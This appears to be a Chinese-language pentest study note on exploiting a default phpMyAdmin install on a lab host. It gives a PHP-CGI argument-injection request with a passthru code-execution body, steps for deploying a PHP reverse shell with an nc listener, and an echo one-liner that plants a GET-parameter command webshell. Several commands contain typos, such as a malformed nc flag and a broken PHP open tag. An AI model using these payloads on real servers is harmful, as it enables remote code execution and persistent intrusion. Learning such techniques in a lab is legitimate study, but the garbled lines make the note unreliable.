手动漏洞挖掘
一 默认安装
1 默认安装-phpmyadmin
Windows默认安装后会开放一些端口 会有漏洞
远程操作漏洞
phpmyadmin/setup
POST http://192.168.56.101/phpMyAdmin/setup/不用登录 既可以访问 管理后台数据库
利用:
(1)
POST
头:
http://192.168.56.101/phpMyAdmin/?-d+allow_url_inlcude%31+-d+auto_prepend_file%3dphp://input HTTP/1.1
Host:192.168.56.101
body:
<?php
passthru('id');
die();
?>
使用这个url写入php代码 使用工具重放攻击(repeater)可以用echo >重定向来写代码进去
(2)
PHP反弹shell(提交服务器请求 里面有反弹连接的shell 目的是shell在服务器执行然后反弹连接客户端的端口 本地开终端窗口监听这个端口)(拿到服务器shell)
/usr/share/webshells里面有asp等的木马
/usr/share/webshells/php-reverse-shell.php
vi一下 在内容进行修改
nc nvvlp 端口 动态监听端口 开一个nc端口 在netstat查看端口可以更直观了解途径
ifconfig无法运行 那么可以这样
Whereis ifconfig
在ifconfig的目录下./ifconfig来使用该命令
(3)
写入webshell(在服务器写一个静态木马页面文件)
echo "<php \$cmd=\$_GET["cmd"];system(\$cmd);?>" > /var/www/3.php
服务器会把变量多虑 加\防止
网页木马的制作